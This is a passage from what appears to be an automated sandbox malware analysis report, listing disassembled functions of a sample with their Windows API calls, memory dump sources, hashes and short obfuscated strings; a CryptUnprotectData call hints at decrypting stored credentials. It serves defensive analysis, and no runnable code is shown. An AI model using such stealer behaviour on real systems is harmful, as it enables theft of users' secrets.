                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • String ID:
                        • API String ID: 3825993179-0
                        • Opcode ID: 22fe2edf2a79afeb072f08dbc1204e143c7384007dfb24d06cded9c1da97a6bc
                        • Instruction ID: 5f996109202df774e47a18e4f92e0811b1f050647ef67ffda0ce18419b90d305
                        • Opcode Fuzzy Hash: 22fe2edf2a79afeb072f08dbc1204e143c7384007dfb24d06cded9c1da97a6bc
                        • Instruction Fuzzy Hash: 1E012174601209BBEB20DFA5DC89BAABBADEF49311F108159FE09C7340DA71D981CB55
                        Function 00512B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0051A3D0,000000FF), ref: 00512B8F
                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00512B96
                        • GetLocalTime.KERNEL32(?,?,00000000,0051A3D0,000000FF), ref: 00512BA2
                        • wsprintfA.USER32 ref: 00512BCE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 7977b484b2949a0bf0d0476d888d6810b1c21e3c2bd344279103100d4847888e
                        • Instruction ID: 5b9090bef8ced1156990a6e3d359d82f46d15527496e9a4f3cf47c1c5516f0f6
                        • Opcode Fuzzy Hash: 7977b484b2949a0bf0d0476d888d6810b1c21e3c2bd344279103100d4847888e
                        • Instruction Fuzzy Hash: F4014CB2904129ABCB249BC9DD45FBEB7BCFB4CB11F00421AFA05A2280E77D5840C7B5
                        Function 004F9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004F9B3B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004F9B4A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004F9B61
                        • LocalFree.KERNEL32 ref: 004F9B70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: aa31948660d26b7c8d0afd3e32bf2ea9f74471bb5faea2bf733f8ed8b134719c
                        • Instruction ID: 8664ab669344e6dae84a0768b0743054b896bd551c56415ca3f738b7f299b5d2
                        • Opcode Fuzzy Hash: aa31948660d26b7c8d0afd3e32bf2ea9f74471bb5faea2bf733f8ed8b134719c
                        • Instruction Fuzzy Hash: 98F0BD703443166BE7305F65AC49F677BA8EF04B51F240515FB45EA2D0D7B89C41CAA8
                        Function 008B3966 Relevance: 5.6, Strings: 4, Instructions: 612COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "Q~$@{__$JAwz$kaH_
                        • API String ID: 0-4150157240
                        • Opcode ID: fddbbe2c90393b68dbca09d89059f249e96003db9ca372f1e9039a3d8fad251e
                        • Instruction ID: 614b86dde9b1abdcccb85b6f32fc17d1b24bfa1802ec9689b183cc804504bf26
                        • Opcode Fuzzy Hash: fddbbe2c90393b68dbca09d89059f249e96003db9ca372f1e9039a3d8fad251e
                        • Instruction Fuzzy Hash: BB1206F3A086149FE304AE2DEC8567AB7E9EF94720F1A4A3DE6C4C3744E67558048793
                        Function 0050CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(0051B110,00000000,00000001,0051B100,?), ref: 0050CB06
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0050CB46
                        • lstrcpyn.KERNEL32(?,?,00000104), ref: 0050CBC9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                        • String ID:
                        • API String ID: 1940255200-0
                        • Opcode ID: f952c258fa8ef3a4836302edb799d6324c4705717266cf07685a990853976589
                        • Instruction ID: df799c195a9e714d45743c64dc757cfaf2892165a807bdb07afc870546dab656
                        • Opcode Fuzzy Hash: f952c258fa8ef3a4836302edb799d6324c4705717266cf07685a990853976589
                        • Instruction Fuzzy Hash: B9314671A40615BFE710DB98CC92FAD7BB9AB89B10F104294FA14EB2D0D7B1AD45CB90
                        Function 004F9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004F9B9F
                        • LocalAlloc.KERNEL32(00000040,?), ref: 004F9BB3
                        • LocalFree.KERNEL32(?), ref: 004F9BD7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 4c5d7dff663bbb3d117f5b60948286d9974ffb48b06a8d992bd127e7dac9c5aa
                        • Instruction ID: 43febff59b1cbf72a61a8c20bf336b274760b0ce86fd56f6ad819dea5920f693
                        • Opcode Fuzzy Hash: 4c5d7dff663bbb3d117f5b60948286d9974ffb48b06a8d992bd127e7dac9c5aa
                        • Instruction Fuzzy Hash: 77011DB5E4120AABE710DBA4DC45FBBB778EB44B00F144555EB04AB380D7B5AE018BE5
                        Function 008B05A8 Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: bb(=
                        • API String ID: 0-4262272353
                        • Opcode ID: 059efcdacb8c1b114d7ad99e80eb6e6eb1eda29f658fa9f1ac9a6512be0a746c
                        • Instruction ID: 6e8c9b8acec69c2a3a0f9125ddd6b2990d320786215cb8c57f4b6bdaa6d8dbf6
                        • Opcode Fuzzy Hash: 059efcdacb8c1b114d7ad99e80eb6e6eb1eda29f658fa9f1ac9a6512be0a746c
                        • Instruction Fuzzy Hash: 49D1E7F390C304AFE3146E6CEC8567AFBE8EB64320F16493DEAC4C7744E635A9058656
                        Function 007DA546 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: B=a~
                        • API String ID: 0-4155588532
                        • Opcode ID: 6677d52114e728ff9c4e69207cdc8cac164cb0815a9280b35d47c79111673e55
                        • Instruction ID: 5135b1bff56eedb2dd8f964d1bc6589ec0835f83e8e7d50992e0919ec745fcd7
                        • Opcode Fuzzy Hash: 6677d52114e728ff9c4e69207cdc8cac164cb0815a9280b35d47c79111673e55
                        • Instruction Fuzzy Hash: 9471C5F3A086009FE345AE29DC4477AF7E5EFD4720F17893DD6C887680EA3948458B86
                        Function 007D0A28 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +Ot
                        • API String ID: 0-2151047281
                        • Opcode ID: cfd18c3d8eca385ab37552f0123ea8fbc5ab072e95eb32dbaf4b676e2501c8e6
                        • Instruction ID: c74a497034bfa1ee84848fbd730c827e2620dd067a61c4aeb77b733a523949ab
                        • Opcode Fuzzy Hash: cfd18c3d8eca385ab37552f0123ea8fbc5ab072e95eb32dbaf4b676e2501c8e6
                        • Instruction Fuzzy Hash: C46126F3E193105FF3045E2DDC857A6B7DAEB94720F1A463D9B98937C0E9796C048286
                        Function 007EC860 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2<S
                        • API String ID: 0-2142661242
                        • Opcode ID: 83e726e11c51f4b8616141037a3d8848708037479b12ea857a2c92a9d04a3738
                        • Instruction ID: 5bfb6eb9ab1a6995d9f1b931da59ffd71b912b9b108621b99cbd03a1926abfd1
                        • Opcode Fuzzy Hash: 83e726e11c51f4b8616141037a3d8848708037479b12ea857a2c92a9d04a3738
                        • Instruction Fuzzy Hash: 765138F3E085149FF7046E39DC4576ABAD6ABD4320F2B863DD9D8D3384E93948468282
                        Function 007B325C Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %Aw
                        • API String ID: 0-1545902326
                        • Opcode ID: 105c3bcb05f093875203f813446f164b83d9064395dafdef22cee4132720a4ae
                        • Instruction ID: d6b2fc2032fb53fe3730e17673ec38e837eea55a70c3d5258ef08491e242ff55
